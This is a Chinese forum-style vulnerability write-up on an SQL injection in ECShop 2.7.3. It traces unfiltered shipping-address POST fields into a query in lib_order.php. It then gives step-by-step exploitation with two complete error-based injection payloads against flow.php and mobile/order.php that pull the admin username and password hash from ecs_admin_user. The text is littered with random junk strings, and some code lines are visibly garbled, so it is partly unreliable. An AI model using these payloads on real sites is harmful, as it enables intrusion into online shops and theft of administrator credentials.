ecshop全版本注入分析

admin

前段时间大概2012年圣诞节左右，在t00ls上看见ecshop全版本注入，当时也下载了最新的程序分析了下,最近考试比较忙，今天刚考完，把我分析的记录下来。
" Z0 M/ [% k; `1 y# }
: a# ^) \1 [5 w    漏洞关键文件：
. D3 ^. ^/ T+ J$ E! s# n) l
% A/ m) }  {  {    /includes/lib_order.php
. s4 h/ n6 b3 R. }* E
    关键函数：
9 m0 x: |3 ]! K/ Y8 w
/ O4 A) j5 p  R/ v- U4 t

& M0 A( V! P3 a+ c; O( d01     function available_shipping_list($region_id_list)
! w& \8 N) w7 H9 Y' d
0 ~; b# \4 O2 g8 T1 _7 r* Q" T( |  S02 {
* {3 @- x$ `, h4 H' @; w
03     $sql = 'SELECT s.shipping_id, s.shipping_code, s.shipping_name, ' .

04                 's.shipping_desc, s.insure, s.support_cod, a.configure ' .

05             'FROM ' . $GLOBALS['ecs']->table('shipping') . ' AS s, ' .
/ S) `; G7 H5 w5 v
, j: G- {1 ]" i$ T% V* I# ?06                 $GLOBALS['ecs']->table('shipping_area') . ' AS a, ' .
% r, T: [. M% k# I  P
07                 $GLOBALS['ecs']->table('area_region') . ' AS r '.

08             'WHERE r.region_id ' . db_create_in($region_id_list) .

09             ' AND r.shipping_area_id = a.shipping_area_id AND a.shipping_id = s.shipping_id AND s.enabled = 1 ORDER BY s.shipping_order';
1 ^' f" q0 w7 F: x/ ?; I* S  k9 j
, X7 J2 W1 f* u- W* ~. y6 v$ K10   

11     return $GLOBALS['db']->getAll($sql);

# L* g$ f8 o" o8 ~$ `% T8 I0 j12 }

- ^. O& \; }$ ^9 D" L显然对传入的参数没有任何过滤就带入了查询语句。

下面我们追踪这个函数在flow.php中：
第531行：   
9 T- l1 l7 n3 g% \5 Y3 f
1 $shipping_list     = available_shipping_list($region);
$ K4 t" J) m- N



8 g$ H: j, l0 H2 R! B# b
! p/ v9 ]8 D) \. @2 B9 E再对传入变量进行追踪：

第530行：   
0 R* p+ U3 u, i  w$ C
/ R8 s% i" O5 g6 r1 $region = array($consignee['country'], $consignee['province'],$consignee['city'], $consignee['district']);
+ E5 u) o$ {5 Y

5 n' Z0 y- V0 ^/ O6 r/ T
# j1 M  u( {3 e) I/ m9 F

8 i. j& ^% h9 q% e) R第473行：        

1 $consignee = get_consignee($_SESSION['user_id']);

到了一个关键函数：
5 ^1 d+ Q4 c/ S! h& R  |1 X- D
/includes/lib_order.php



; Z) T% j' H0 V2 w0 F
5 \$ R- C" \' l2 t; N- |
; p( B7 ^: }8 s' W/ j  b01 function get_consignee($user_id)

8 [' o* v/ ]* \/ |  ]1 ^5 m, D( g02 {

' F  }: u/ u+ }- j8 J+ g03     if (isset($_SESSION['flow_consignee']))

04     {

05         /* 如果存在session，则直接返回session中的收货人信息 */
: z. r. U+ a3 y# A: P; |
06   

4 `: [' l  x4 c$ w$ S9 g1 _7 i07         return $_SESSION['flow_consignee'];
) c; @$ N- ]8 Y8 j& z. ~
4 k4 A0 a* {7 V) ~08     }
) C/ T+ s, E* A+ b- q, E; I4 A
$ `# T3 ]9 }+ j) D# z* U3 v$ O7 I09     else
8 u5 [" F* q2 P9 y: J. D
2 d' ~" v0 t7 w, K3 r* l: g- J+ R( X( e10     {
+ L5 K( w/ w( H  Z$ j7 }
3 {  s; V9 a8 e3 Y  D0 B  o11         /* 如果不存在，则取得用户的默认收货人信息 */

/ q, a% u6 o- y* P' T) a12         $arr = array();

13   

14         if ($user_id > 0)
% ]- P' J" D1 P" j% [# o- x
( {$ e* t! x% [- l; ]15         {

16             /* 取默认地址 */

3 g! b) F9 B: F$ U* k17             $sql = "SELECT ua.*".
6 q* `) k7 b8 W7 J& S
  @- S, m' @% w0 c* @18                     " FROM " . $GLOBALS['ecs']->table('user_address') . "AS ua, ".$GLOBALS['ecs']->table('users').' AS u '.

, ]0 u. S: J$ @% z6 Q+ e' r) Q19                     " WHERE u.user_id='$user_id' AND ua.address_id = u.address_id";
% I' l/ ?* g  o; b, ?
8 ]8 V) A- M( X: }4 b20   

! y, O: [0 M" \/ T9 w21             $arr = $GLOBALS['db']->getRow($sql);
8 K8 _) [- G5 S9 y1 O1 S: }8 H# h
; c2 u# c8 `9 h6 W$ G+ T$ m- p4 N22         }
  U) d7 N, f2 _8 O5 s. `  _; F
23   
3 v. z# T; r- W% G/ U' j* R" ^5 u0 t
24         return $arr;

25     }

26 }
9 s! r' P" W+ a/ Y# I
) n) U& S( K2 B. z7 \显然如果 isset($_SESSION['flow_consignee']存在就直接使用。到底存不存在呢？
% X1 ]! T% q$ Z; k: C' g9 ^6 `


关键点:

第400行：    $_SESSION['flow_consignee'] = stripslashes_deep($consignee);

) Z5 }# P% O; ~$ ?9 L9 r1 b8 D7 P这里对传入参数反转义存入$_SESSION中。


# _8 `3 q( z$ W* @) ^; @6 P  p: W
然后看下：


$ z7 O1 x5 ]* ^
# p0 B4 {* L  l$ D) m4 f1 ^0 x% [   

6 X0 v: L; H, R2 a: T7 B1 i# ~$ z01 $consignee = array(

& o0 K+ s9 O+ u' |5 ^7 m6 k" {02         'address_id'    => empty($_POST['address_id']) ? 0  :intval($_POST['address_id']),

; V7 \& b" ~5 t. _! L1 v03         'consignee'     => empty($_POST['consignee'])  ? '' : trim($_POST['consignee']),

/ p7 k0 V. H3 k/ m: [04         'country'       => empty($_POST['country'])    ? '' _POST['country'],
8 F: W  }; H( J6 y2 N% w& M
05         'province'      => empty($_POST['province'])   ? '' _POST['province'],

" G: f& \: `1 r- D" N  u1 \06         'city'          => empty($_POST['city'])       ? '' _POST['city'],
5 U( e  T3 k- @* p9 ~
. [- d6 U: S# b07         'district'      => empty($_POST['district'])   ? '' _POST['district'],
/ }$ Y. ~( q" ?  t
" R' C' [% Y7 A$ f. [08         'email'         => empty($_POST['email'])      ? '' _POST['email'],
: b" _% M0 D1 y8 i4 r: p* x
09         'address'       => empty($_POST['address'])    ? '' _POST['address'],
% |0 g' u$ S* f5 i+ ~% a# W
% o5 o4 n# p! J2 r10         'zipcode'       => empty($_POST['zipcode'])    ? '' : make_semiangle(trim($_POST['zipcode'])),
; E3 y: |# b7 F4 f" Q2 K" a- E
11         'tel'           => empty($_POST['tel'])        ? '' : make_semiangle(trim($_POST['tel'])),
: H/ ^( _+ R0 U* g. X* L
12         'mobile'        => empty($_POST['mobile'])     ? '' : make_semiangle(trim($_POST['mobile'])),

& B2 m) b5 D9 K% i/ h+ p: M* y. r# k13         'sign_building' => empty($_POST['sign_building']) ? '' _POST['sign_building'],

14         'best_time'     => empty($_POST['best_time'])  ? '' _POST['best_time'],

8 F7 a6 P3 V- Z" ?7 e15     );
+ A; v8 A+ O1 t; A  K( z
好了注入就这样出现了。

==================

注入测试：
; I6 W" H3 s* r
环境:windows7+xampp1.7.7(Apache2.2.21+Php 5.3.8+Mysql 5.5.16)

' d. l; a5 Y+ ]; N' Y; a测试程序：ECShop_V2.7.3_UTF8_release1106
4 `9 m* V7 R4 T9 t


7 |; g! }0 m) X5 b- D5 r$ K& l1.首先需要点击一个商品加入购物车
) [+ C/ |& M& K/ v) Z; t
2.注册一个会员帐号

3.post提交数据
  p& W5 l( m) h9 d# a) e
5 L/ v  b0 n, u* ]5 \, ?$ b) A

0 P' b' |  B- m- }9 n! `1 http://127.0.0.1/ecshop/flow.php

2   

3 country=1&province=3') and (select 1 from(select count(*),concat((select (select (SELECT concat(user_name,0x7c,password) FROM ecs_admin_user limit 0,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1 #&city=37&district=409&consignee=11111&email=11111111%40qq.com&address=1111111111&zipcode=11111111&tel=1111111111111111111&mobile=11111111&sign_building=111111111&best_time=111111111&Submit=%E9%85%8D%E9%80%81%E8%87%B3%E8%BF%99%E4%B8%AA%E5%9C%B0%E5%9D%80&step=consignee&act=checkout&address_id=
1 {& T& E. a* n8 p2 x举一反三，我们根据这个漏洞我们可以继续深入挖掘：

' d( Z. J; S: ?我们搜寻关键函数function available_shipping_list()
+ k+ }! c( G# s) R) A
在文件/moblie/order.php中出现有，次文件为手机浏览文件功能基本和flow.php相同，代码流程基本相同
6 K( }; J" D7 X  S
/ n: F% n; [9 }+ g利用exp:
6 f; p- c1 Q5 c+ D8 D( V7 D& U
& r. T+ ^' v, R; O1.点击一个商品，点击购买商标
& i- q! z: D" E8 o  Q
2.登录会员帐号
/ z% f7 N* n* z/ D$ p% O
3.post提交：

http://127.0.0.1/ecshop/mobile/order.php

  c% Z' x/ B" a, M

country=1&province=3') and (select 1 from(select count(*),concat((select (select (SELECT concat(user_name,0x7c,password) FROM ecs_admin_user limit 0,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1 #&city=37&district=409&consignee=11111&email=11111111%40qq.com&address=1111111111&zipcode=11111111&tel=1111111111111111111&mobile=11111111&sign_building=111111111&best_time=111111111&Submit=%E9%85%8D%E9%80%81%E8%87%B3%E8%BF%99%E4%B8%AA%E5%9C%B0%E5%9D%80&&act=order_lise&address_id=